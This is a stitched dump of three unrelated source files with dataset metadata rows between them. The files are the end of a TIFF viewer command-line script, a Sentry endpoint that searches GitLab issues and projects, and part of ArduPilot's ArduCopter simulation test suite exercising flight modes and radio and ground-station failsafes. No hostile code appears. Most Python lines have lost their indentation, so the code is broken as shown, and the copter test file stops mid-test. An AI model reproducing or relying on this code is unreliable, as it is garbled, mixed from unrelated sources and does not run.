'Dimension %i' % axis, 0, data.shape[axis]-1, 0, facecolor='0.5',
valfmt='%%.0f [%i]' % data.shape[axis]) for axis in range(dims)]
for slider in sliders:
slider.drawon = False
def set_image(current, sliders=sliders, data=data):
# change image and redraw canvas
cur_ax_dat[1] = data[tuple(current)].squeeze()
image.set_data(cur_ax_dat[1])
for ctrl, index in zip(sliders, current):
ctrl.eventson = False
ctrl.set_val(index)
ctrl.eventson = True
figure.canvas.draw()
def on_changed(index, axis, data=data, current=current):
# callback function for slider change event
index = int(round(index))
cur_ax_dat[0] = axis
if index == current[axis]:
return
if index >= data.shape[axis]:
index = 0
elif index < 0:
index = data.shape[axis] - 1
current[axis] = index
set_image(current)
def on_keypressed(event, data=data, current=current):
# callback function for key press event
key = event.key
axis = cur_ax_dat[0]
            if str(key) in '0123456789':
                on_changed(int(key), axis)
elif key == 'right':
on_changed(current[axis] + 1, axis)
elif key == 'left':
on_changed(current[axis] - 1, axis)
elif key == 'up':
cur_ax_dat[0] = 0 if axis == len(data.shape)-1 else axis + 1
elif key == 'down':
cur_ax_dat[0] = len(data.shape)-1 if axis == 0 else axis - 1
elif key == 'end':
on_changed(data.shape[axis] - 1, axis)
elif key == 'home':
on_changed(0, axis)
figure.canvas.mpl_connect('key_press_event', on_keypressed)
for axis, ctrl in enumerate(sliders):
ctrl.on_changed(lambda k, a=axis: on_changed(k, a))
return figure, subplot, image
def _app_show():
"""Block the GUI. For use as skimage plugin."""
pyplot = sys.modules['matplotlib.pyplot']
pyplot.show()
def main(argv=None):
"""Command line usage main function."""
    if sys.version_info < (2, 6):
print("This script requires Python version 2.6 or better.")
print("This is Python version %s" % sys.version)
return 0
if argv is None:
argv = sys.argv
import optparse
parser = optparse.OptionParser(
usage="usage: %prog [options] path",
description="Display image data in TIFF files.",
version="%%prog %s" % __version__)
opt = parser.add_option
opt('-p', '--page', dest='page', type='int', default=-1,
help="display single page")
opt('-s', '--series', dest='series', type='int', default=-1,
help="display series of pages of same shape")
opt('--nomultifile', dest='nomultifile', action='store_true',
default=False, help="don't read OME series from multiple files")
opt('--noplot', dest='noplot', action='store_true', default=False,
help="don't display images")
opt('--interpol', dest='interpol', metavar='INTERPOL', default='bilinear',
help="image interpolation method")
opt('--dpi', dest='dpi', type='int', default=96,
help="set plot resolution")
opt('--debug', dest='debug', action='store_true', default=False,
help="raise exception on failures")
opt('--test', dest='test', action='store_true', default=False,
help="try read all images in path")
opt('--doctest', dest='doctest', action='store_true', default=False,
help="runs the docstring examples")
opt('-v', '--verbose', dest='verbose', action='store_true', default=True)
opt('-q', '--quiet', dest='verbose', action='store_false')
settings, path = parser.parse_args()
path = ' '.join(path)
if settings.doctest:
import doctest
doctest.testmod()
return 0
if not path:
parser.error("No file specified")
if settings.test:
test_tifffile(path, settings.verbose)
return 0
if any(i in path for i in '?*'):
path = glob.glob(path)
if not path:
print('no files match the pattern')
return 0
# TODO: handle image sequences
#if len(path) == 1:
path = path[0]
print("Reading file structure...", end=' ')
start = time.time()
try:
tif = TiffFile(path, multifile=not settings.nomultifile)
except Exception as e:
if settings.debug:
raise
else:
print("\n", e)
sys.exit(0)
print("%.3f ms" % ((time.time()-start) * 1e3))
if tif.is_ome:
settings.norgb = True
images = [(None, tif[0 if settings.page < 0 else settings.page])]
if not settings.noplot:
print("Reading image data... ", end=' ')
def notnone(x):
return next(i for i in x if i is not None)
start = time.time()
try:
if settings.page >= 0:
images = [(tif.asarray(key=settings.page),
tif[settings.page])]
elif settings.series >= 0:
images = [(tif.asarray(series=settings.series),
notnone(tif.series[settings.series].pages))]
else:
images = []
for i, s in enumerate(tif.series):
try:
images.append(
(tif.asarray(series=i), notnone(s.pages)))
except ValueError as e:
images.append((None, notnone(s.pages)))
if settings.debug:
raise
else:
print("\n* series %i failed: %s... " % (i, e),
end='')
print("%.3f ms" % ((time.time()-start) * 1e3))
except Exception as e:
if settings.debug:
raise
else:
print(e)
tif.close()
print("\nTIFF file:", tif)
print()
for i, s in enumerate(tif.series):
print ("Series %i" % i)
print(s)
print()
for i, page in images:
print(page)
print(page.tags)
if page.is_palette:
print("\nColor Map:", page.color_map.shape, page.color_map.dtype)
for attr in ('cz_lsm_info', 'cz_lsm_scan_info', 'uic_tags',
'mm_header', 'imagej_tags', 'micromanager_metadata',
'nih_image_header'):
if hasattr(page, attr):
print("", attr.upper(), Record(getattr(page, attr)), sep="\n")
print()
if page.is_micromanager:
print('MICROMANAGER_FILE_METADATA')
print(Record(tif.micromanager_metadata))
if images and not settings.noplot:
try:
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import pyplot
except ImportError as e:
warnings.warn("failed to import matplotlib.\n%s" % e)
else:
for img, page in images:
if img is None:
continue
vmin, vmax = None, None
if 'gdal_nodata' in page.tags:
try:
vmin = numpy.min(img[img > float(page.gdal_nodata)])
except ValueError:
pass
if page.is_stk:
try:
vmin = page.uic_tags['min_scale']
vmax = page.uic_tags['max_scale']
except KeyError:
pass
else:
if vmax <= vmin:
vmin, vmax = None, None
title = "%s\n %s" % (str(tif), str(page))
imshow(img, title=title, vmin=vmin, vmax=vmax,
bitspersample=page.bits_per_sample,
photometric=page.photometric,
interpolation=settings.interpol,
dpi=settings.dpi)
pyplot.show()
TIFFfile = TiffFile # backwards compatibility
if sys.version_info[0] > 2:
basestring = str, bytes
unicode = str
if __name__ == "__main__":
sys.exit(main())
|
bsd-3-clause
| 771,240,095,069,591,600
| 34.651316
| 79
| 0.537928
| false
| 3.695429
| false
| false
| false
|
mvaled/sentry
|
src/sentry/integrations/gitlab/search.py
|
2
|
2359
|
from __future__ import absolute_import
import six
from rest_framework.response import Response
from sentry.api.bases.integration import IntegrationEndpoint
from sentry.integrations.exceptions import ApiError
from sentry.models import Integration
class GitlabIssueSearchEndpoint(IntegrationEndpoint):
def get(self, request, organization, integration_id):
try:
integration = Integration.objects.get(
organizations=organization, id=integration_id, provider="gitlab"
)
except Integration.DoesNotExist:
return Response(status=404)
field = request.GET.get("field")
query = request.GET.get("query")
if field is None:
return Response({"detail": "field is a required parameter"}, status=400)
if query is None:
return Response({"detail": "query is a required parameter"}, status=400)
installation = integration.get_installation(organization.id)
if field == "externalIssue":
project = request.GET.get("project")
if project is None:
return Response({"detail": "project is a required parameter"}, status=400)
try:
iids = [int(query)]
query = None
except ValueError:
iids = None
try:
response = installation.search_issues(query=query, project_id=project, iids=iids)
except ApiError as e:
return Response({"detail": six.text_type(e)}, status=400)
return Response(
[
{
"label": "(#%s) %s" % (i["iid"], i["title"]),
"value": "%s#%s" % (i["project_id"], i["iid"]),
}
for i in response
]
)
elif field == "project":
try:
response = installation.search_projects(query)
except ApiError as e:
return Response({"detail": six.text_type(e)}, status=400)
return Response(
[
{"label": project["name_with_namespace"], "value": project["id"]}
for project in response
]
)
return Response({"detail": "invalid field value"}, status=400)
|
bsd-3-clause
| 6,474,268,268,709,563,000
| 34.742424
| 97
| 0.539635
| false
| 4.884058
| false
| false
| false
|
samuelctabor/ardupilot
|
Tools/autotest/arducopter.py
|
1
|
288681
|
#!/usr/bin/env python
'''
Fly Copter in SITL
AP_FLAKE8_CLEAN
'''
from __future__ import print_function
import copy
import math
import os
import shutil
import time
import numpy
from pymavlink import mavutil
from pymavlink import mavextra
from pymavlink import rotmat
from pysim import util
from pysim import vehicleinfo
from common import AutoTest
from common import NotAchievedException, AutoTestTimeoutException, PreconditionFailedException
from common import Test
from pymavlink.rotmat import Vector3
# get location of scripts
testdir = os.path.dirname(os.path.realpath(__file__))
SITL_START_LOCATION = mavutil.location(-35.362938, 149.165085, 584, 270)
SITL_START_LOCATION_AVC = mavutil.location(40.072842, -105.230575, 1586, 0)
# Flight mode switch positions are set-up in arducopter.param to be
# switch 1 = Circle
# switch 2 = Land
# switch 3 = RTL
# switch 4 = Auto
# switch 5 = Loiter
# switch 6 = Stabilize
class AutoTestCopter(AutoTest):
@staticmethod
def get_not_armable_mode_list():
return ["AUTO", "AUTOTUNE", "BRAKE", "CIRCLE", "FLIP", "LAND", "RTL", "SMART_RTL", "AVOID_ADSB", "FOLLOW"]
@staticmethod
def get_not_disarmed_settable_modes_list():
return ["FLIP", "AUTOTUNE"]
@staticmethod
def get_no_position_not_settable_modes_list():
return []
@staticmethod
def get_position_armable_modes_list():
return ["DRIFT", "GUIDED", "LOITER", "POSHOLD", "THROW"]
@staticmethod
def get_normal_armable_modes_list():
return ["ACRO", "ALT_HOLD", "SPORT", "STABILIZE", "GUIDED_NOGPS"]
def log_name(self):
return "ArduCopter"
def test_filepath(self):
return os.path.realpath(__file__)
def set_current_test_name(self, name):
self.current_test_name_directory = "ArduCopter_Tests/" + name + "/"
def sitl_start_location(self):
return SITL_START_LOCATION
def mavproxy_options(self):
ret = super(AutoTestCopter, self).mavproxy_options()
if self.frame != 'heli':
ret.append('--quadcopter')
return ret
def sitl_streamrate(self):
return 5
def vehicleinfo_key(self):
return 'ArduCopter'
def default_frame(self):
return "+"
def apply_defaultfile_parameters(self):
# Copter passes in a defaults_filepath in place of applying
# parameters afterwards.
pass
def defaults_filepath(self):
return self.model_defaults_filepath(self.vehicleinfo_key(), self.frame)
def wait_disarmed_default_wait_time(self):
return 120
def close(self):
super(AutoTestCopter, self).close()
# [2014/05/07] FC Because I'm doing a cross machine build
# (source is on host, build is on guest VM) I cannot hard link
# This flag tells me that I need to copy the data out
if self.copy_tlog:
shutil.copy(self.logfile, self.buildlog)
def is_copter(self):
return True
def get_stick_arming_channel(self):
return int(self.get_parameter("RCMAP_YAW"))
def get_disarm_delay(self):
return int(self.get_parameter("DISARM_DELAY"))
def set_autodisarm_delay(self, delay):
self.set_parameter("DISARM_DELAY", delay)
def user_takeoff(self, alt_min=30):
'''takeoff using mavlink takeoff command'''
self.run_cmd(mavutil.mavlink.MAV_CMD_NAV_TAKEOFF,
0, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
alt_min # param7
)
self.progress("Ran command")
self.wait_for_alt(alt_min)
def takeoff(self,
alt_min=30,
takeoff_throttle=1700,
require_absolute=True,
mode="STABILIZE",
timeout=120):
"""Takeoff get to 30m altitude."""
self.progress("TAKEOFF")
self.change_mode(mode)
if not self.armed():
self.wait_ready_to_arm(require_absolute=require_absolute, timeout=timeout)
self.zero_throttle()
self.arm_vehicle()
if mode == 'GUIDED':
self.user_takeoff(alt_min=alt_min)
else:
self.set_rc(3, takeoff_throttle)
self.wait_for_alt(alt_min=alt_min, timeout=timeout)
self.hover()
self.progress("TAKEOFF COMPLETE")
def wait_for_alt(self, alt_min=30, timeout=30, max_err=5):
"""Wait for minimum altitude to be reached."""
self.wait_altitude(alt_min - 1,
(alt_min + max_err),
relative=True,
timeout=timeout)
def land_and_disarm(self, timeout=60):
"""Land the quad."""
self.progress("STARTING LANDING")
self.change_mode("LAND")
self.wait_landed_and_disarmed(timeout=timeout)
def wait_landed_and_disarmed(self, min_alt=6, timeout=60):
"""Wait to be landed and disarmed"""
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
if alt > min_alt:
self.wait_for_alt(min_alt, timeout=timeout)
# self.wait_statustext("SIM Hit ground", timeout=timeout)
self.wait_disarmed()
def hover(self, hover_throttle=1500):
self.set_rc(3, hover_throttle)
# Climb/descend to a given altitude
def setAlt(self, desiredAlt=50):
pos = self.mav.location(relative_alt=True)
if pos.alt > desiredAlt:
self.set_rc(3, 1300)
self.wait_altitude((desiredAlt-5), desiredAlt, relative=True)
if pos.alt < (desiredAlt-5):
self.set_rc(3, 1800)
self.wait_altitude((desiredAlt-5), desiredAlt, relative=True)
self.hover()
# Takeoff, climb to given altitude, and fly east for 10 seconds
def takeoffAndMoveAway(self, dAlt=50, dDist=50):
self.progress("Centering sticks")
self.set_rc_from_map({
1: 1500,
2: 1500,
3: 1000,
4: 1500,
})
self.takeoff(alt_min=dAlt)
self.change_mode("ALT_HOLD")
self.progress("Yaw to east")
self.set_rc(4, 1580)
self.wait_heading(90)
self.set_rc(4, 1500)
self.progress("Fly eastbound away from home")
self.set_rc(2, 1800)
self.delay_sim_time(10)
self.set_rc(2, 1500)
self.hover()
self.progress("Copter staging 50 meters east of home at 50 meters altitude In mode Alt Hold")
# loiter - fly south west, then loiter within 5m position and altitude
def loiter(self, holdtime=10, maxaltchange=5, maxdistchange=5):
"""Hold loiter position."""
self.takeoff(10, mode="LOITER")
# first aim south east
self.progress("turn south east")
self.set_rc(4, 1580)
self.wait_heading(170)
self.set_rc(4, 1500)
# fly south east 50m
self.set_rc(2, 1100)
self.wait_distance(50)
self.set_rc(2, 1500)
# wait for copter to slow moving
self.wait_groundspeed(0, 2)
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
start = self.mav.location()
tstart = self.get_sim_time()
self.progress("Holding loiter at %u meters for %u seconds" %
(start_altitude, holdtime))
while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
pos = self.mav.location()
delta = self.get_distance(start, pos)
alt_delta = math.fabs(m.alt - start_altitude)
self.progress("Loiter Dist: %.2fm, alt:%u" % (delta, m.alt))
if alt_delta > maxaltchange:
raise NotAchievedException(
"Loiter alt shifted %u meters (> limit %u)" %
(alt_delta, maxaltchange))
if delta > maxdistchange:
raise NotAchievedException(
"Loiter shifted %u meters (> limit of %u)" %
(delta, maxdistchange))
self.progress("Loiter OK for %u seconds" % holdtime)
self.progress("Climb to 30m")
self.change_alt(30)
self.progress("Descend to 20m")
self.change_alt(20)
self.do_RTL()
def watch_altitude_maintained(self, min_alt, max_alt, timeout=10):
'''watch alt, relative alt must remain between min_alt and max_alt'''
tstart = self.get_sim_time_cached()
while True:
if self.get_sim_time_cached() - tstart > timeout:
return
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
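            # NOTE: VFR_HUD.alt is absolute altitude (AMSL); only the lower
            # bound is enforced here and max_alt is currently unused.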
if m.alt <= min_alt:
raise NotAchievedException("Altitude not maintained: want >%f got=%f" % (min_alt, m.alt))
def test_mode_ALT_HOLD(self):
self.takeoff(10, mode="ALT_HOLD")
self.watch_altitude_maintained(9, 11, timeout=5)
# feed in full elevator and aileron input and make sure we
# retain altitude:
self.set_rc_from_map({
1: 1000,
2: 1000,
})
self.watch_altitude_maintained(9, 11, timeout=5)
self.set_rc_from_map({
1: 1500,
2: 1500,
})
self.do_RTL()
def fly_to_origin(self, final_alt=10):
origin = self.poll_message("GPS_GLOBAL_ORIGIN")
self.change_mode("GUIDED")
self.guided_move_global_relative_alt(origin.latitude,
origin.longitude,
final_alt)
def change_alt(self, alt_min, climb_throttle=1920, descend_throttle=1080):
"""Change altitude."""
def adjust_altitude(current_alt, target_alt, accuracy):
if math.fabs(current_alt - target_alt) <= accuracy:
self.hover()
elif current_alt < target_alt:
self.set_rc(3, climb_throttle)
else:
self.set_rc(3, descend_throttle)
self.wait_altitude(
(alt_min - 5),
alt_min,
relative=True,
called_function=lambda current_alt, target_alt: adjust_altitude(current_alt, target_alt, 1)
)
self.hover()
def setGCSfailsafe(self, paramValue=0):
# Slow down the sim rate if GCS Failsafe is in use
if paramValue == 0:
self.set_parameter("FS_GCS_ENABLE", paramValue)
self.set_parameter("SIM_SPEEDUP", 10)
else:
self.set_parameter("SIM_SPEEDUP", 4)
self.set_parameter("FS_GCS_ENABLE", paramValue)
# fly a square in alt_hold mode
def fly_square(self, side=50, timeout=300):
        """Fly a square, flying N then E."""
        self.takeoff(20, mode="ALT_HOLD")
tstart = self.get_sim_time()
# ensure all sticks in the middle
self.set_rc_from_map({
1: 1500,
2: 1500,
3: 1500,
4: 1500,
})
# switch to loiter mode temporarily to stop us from rising
self.change_mode('LOITER')
# first aim north
self.progress("turn right towards north")
self.set_rc(4, 1580)
self.wait_heading(10)
self.set_rc(4, 1500)
# save bottom left corner of box as waypoint
self.progress("Save WP 1 & 2")
self.save_wp()
# switch back to ALT_HOLD mode
self.change_mode('ALT_HOLD')
# pitch forward to fly north
self.progress("Going north %u meters" % side)
self.set_rc(2, 1300)
self.wait_distance(side)
self.set_rc(2, 1500)
# save top left corner of square as waypoint
self.progress("Save WP 3")
self.save_wp()
# roll right to fly east
self.progress("Going east %u meters" % side)
self.set_rc(1, 1700)
self.wait_distance(side)
self.set_rc(1, 1500)
# save top right corner of square as waypoint
self.progress("Save WP 4")
self.save_wp()
# pitch back to fly south
self.progress("Going south %u meters" % side)
self.set_rc(2, 1700)
self.wait_distance(side)
self.set_rc(2, 1500)
# save bottom right corner of square as waypoint
self.progress("Save WP 5")
self.save_wp()
# roll left to fly west
self.progress("Going west %u meters" % side)
self.set_rc(1, 1300)
self.wait_distance(side)
self.set_rc(1, 1500)
# save bottom left corner of square (should be near home) as waypoint
self.progress("Save WP 6")
self.save_wp()
# reduce throttle again
self.set_rc(3, 1500)
# descend to 10m
self.progress("Descend to 10m in Loiter")
self.change_mode('LOITER')
self.set_rc(3, 1200)
time_left = timeout - (self.get_sim_time() - tstart)
self.progress("timeleft = %u" % time_left)
if time_left < 20:
time_left = 20
self.wait_altitude(-10, 10, timeout=time_left, relative=True)
self.set_rc(3, 1500)
self.save_wp()
# save the stored mission to file
mavproxy = self.start_mavproxy()
num_wp = self.save_mission_to_file_using_mavproxy(
mavproxy,
os.path.join(testdir, "ch7_mission.txt"))
self.stop_mavproxy(mavproxy)
if not num_wp:
self.fail_list.append("save_mission_to_file")
self.progress("save_mission_to_file failed")
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.change_mode('AUTO')
self.set_current_waypoint(1)
self.wait_waypoint(0, num_wp-1, timeout=500)
self.progress("test: MISSION COMPLETE: passed!")
self.land_and_disarm()
# enter RTL mode and wait for the vehicle to disarm
def do_RTL(self, distance_min=None, check_alt=True, distance_max=10, timeout=250):
"""Enter RTL mode and wait for the vehicle to disarm at Home."""
self.change_mode("RTL")
self.hover()
self.wait_rtl_complete(check_alt=check_alt, distance_max=distance_max, timeout=timeout)
def wait_rtl_complete(self, check_alt=True, distance_max=10, timeout=250):
"""Wait for RTL to reach home and disarm"""
self.progress("Waiting RTL to reach Home and disarm")
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
home = ""
alt_valid = alt <= 1
distance_valid = home_distance < distance_max
if check_alt:
if alt_valid and distance_valid:
home = "HOME"
else:
if distance_valid:
home = "HOME"
self.progress("Alt: %.02f HomeDist: %.02f %s" %
(alt, home_distance, home))
# our post-condition is that we are disarmed:
if not self.armed():
if home == "":
raise NotAchievedException("Did not get home")
# success!
return
raise AutoTestTimeoutException("Did not get home and disarm")
def fly_loiter_to_alt(self):
"""loiter to alt"""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
self.set_parameter("PLND_TYPE", 4)
self.set_analog_rangefinder_parameters()
self.reboot_sitl()
num_wp = self.load_mission("copter_loiter_to_alt.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1550)
self.wait_current_waypoint(2)
self.set_rc(3, 1500)
self.wait_waypoint(0, num_wp-1, timeout=500)
self.wait_disarmed()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
# Tests all actions and logic behind the radio failsafe
def fly_throttle_failsafe(self, side=60, timeout=360):
self.start_subtest("If you haven't taken off yet RC failure should be instant disarm")
self.change_mode("STABILIZE")
self.set_parameter("DISARM_DELAY", 0)
self.arm_vehicle()
self.set_parameter("SIM_RC_FAIL", 1)
self.disarm_wait(timeout=1)
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter("DISARM_DELAY", 10)
# Trigger an RC failure with the failsafe disabled. Verify no action taken.
self.start_subtest("Radio failsafe disabled test: FS_THR_ENABLE=0 should take no failsafe action")
self.set_parameter('FS_THR_ENABLE', 0)
self.set_parameter('FS_OPTIONS', 0)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.end_subtest("Completed Radio failsafe disabled test")
# Trigger an RC failure, verify radio failsafe triggers,
        # restore radio, verify RC function by changing modes to circle
# and stabilize.
self.start_subtest("Radio failsafe recovery test")
self.set_parameter('FS_THR_ENABLE', 1)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.set_rc(5, 1050)
self.wait_mode("CIRCLE")
self.set_rc(5, 1950)
self.wait_mode("STABILIZE")
self.end_subtest("Completed Radio failsafe recovery test")
        # Trigger an RC failure, verify failsafe triggers and RTL completes
self.start_subtest("Radio failsafe RTL with no options test: FS_THR_ENABLE=1 & FS_OPTIONS=0")
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe RTL with no options test")
        # Trigger an RC failure, verify failsafe triggers and land completes
self.start_subtest("Radio failsafe LAND with no options test: FS_THR_ENABLE=3 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 3)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe LAND with no options test")
        # Trigger an RC failure, verify failsafe triggers and SmartRTL completes
self.start_subtest("Radio failsafe SmartRTL->RTL with no options test: FS_THR_ENABLE=4 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->RTL with no options test")
        # Trigger an RC failure, verify failsafe triggers and SmartRTL completes
self.start_subtest("Radio failsafe SmartRTL->Land with no options test: FS_THR_ENABLE=5 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL_Land with no options test")
# Trigger a GPS failure and RC failure, verify RTL fails into
# land mode and completes
self.start_subtest("Radio failsafe RTL fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 1)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe RTL fails into land mode due to bad position.")
# Trigger a GPS failure and RC failure, verify SmartRTL fails
# into land mode and completes
self.start_subtest("Radio failsafe SmartRTL->RTL fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe SmartRTL->RTL fails into land mode due to bad position.")
# Trigger a GPS failure and RC failure, verify SmartRTL fails
# into land mode and completes
self.start_subtest("Radio failsafe SmartRTL->LAND fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe SmartRTL->LAND fails into land mode due to bad position.")
# Trigger a GPS failure, then restore the GPS. Trigger an RC
# failure, verify SmartRTL fails into RTL and completes
self.start_subtest("Radio failsafe SmartRTL->RTL fails into RTL mode due to no path.")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.wait_statustext("SmartRTL deactivated: bad position", timeout=60)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->RTL fails into RTL mode due to no path.")
# Trigger a GPS failure, then restore the GPS. Trigger an RC
# failure, verify SmartRTL fails into Land and completes
self.start_subtest("Radio failsafe SmartRTL->LAND fails into land mode due to no path.")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.wait_statustext("SmartRTL deactivated: bad position", timeout=60)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->LAND fails into land mode due to no path.")
# Trigger an RC failure in guided mode with the option enabled
# to continue in guided. Verify no failsafe action takes place
self.start_subtest("Radio failsafe with option to continue in guided mode: FS_THR_ENABLE=1 & FS_OPTIONS=4")
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.setGCSfailsafe(1)
self.set_parameter('FS_THR_ENABLE', 1)
self.set_parameter('FS_OPTIONS', 4)
self.takeoffAndMoveAway()
self.change_mode("GUIDED")
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("GUIDED")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.change_mode("ALT_HOLD")
self.setGCSfailsafe(0)
# self.change_mode("RTL")
# self.wait_disarmed()
self.end_subtest("Completed Radio failsafe with option to continue in guided mode")
# Trigger an RC failure in AUTO mode with the option enabled
# to continue the mission. Verify no failsafe action takes
# place
self.start_subtest("Radio failsafe RTL with option to continue mission: FS_THR_ENABLE=1 & FS_OPTIONS=1")
self.set_parameter('FS_OPTIONS', 1)
self.progress("# Load copter_mission")
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
# self.takeoffAndMoveAway()
self.change_mode("AUTO")
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("AUTO")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.wait_mode("AUTO")
# self.change_mode("RTL")
# self.wait_disarmed()
self.end_subtest("Completed Radio failsafe RTL with option to continue mission")
# Trigger an RC failure in AUTO mode without the option
# enabled to continue. Verify failsafe triggers and RTL
# completes
self.start_subtest("Radio failsafe RTL in mission without "
"option to continue should RTL: FS_THR_ENABLE=1 & FS_OPTIONS=0")
self.set_parameter('FS_OPTIONS', 0)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.clear_mission(mavutil.mavlink.MAV_MISSION_TYPE_MISSION)
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe RTL in mission without option to continue")
self.progress("All radio failsafe tests complete")
self.set_parameter('FS_THR_ENABLE', 0)
self.reboot_sitl()
# Tests all actions and logic behind the GCS failsafe
def fly_gcs_failsafe(self, side=60, timeout=360):
try:
self.test_gcs_failsafe(side=side, timeout=timeout)
except Exception as ex:
self.setGCSfailsafe(0)
self.set_parameter('FS_OPTIONS', 0)
self.disarm_vehicle(force=True)
self.reboot_sitl()
raise ex
def test_gcs_failsafe(self, side=60, timeout=360):
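        # The GCS failsafe is driven by loss of MAVLink heartbeats:
        # set_heartbeat_rate(0) stops our heartbeats to simulate link
        # loss, and restoring the rate clears the failsafe.
        # setGCSfailsafe(n) sets FS_GCS_ENABLE (per the subtest titles
        # below: 1=RTL, 3=SmartRTL->RTL, 4=SmartRTL->Land, 5=Land).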
        # Test double-SmartRTL; ensure we do SmartRTL twice rather than
# landing (tests fix for actual bug)
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.context_push()
self.start_subtest("GCS failsafe SmartRTL twice")
self.setGCSfailsafe(3)
self.set_parameter('FS_OPTIONS', 8)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe")
def ensure_smartrtl(mav, m):
if m.get_type() != "HEARTBEAT":
return
# can't use mode_is here because we're in the message hook
print("Mode: %s" % self.mav.flightmode)
if self.mav.flightmode != "SMART_RTL":
raise NotAchievedException("Not in SMART_RTL")
self.install_message_hook_context(ensure_smartrtl)
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.set_heartbeat_rate(0)
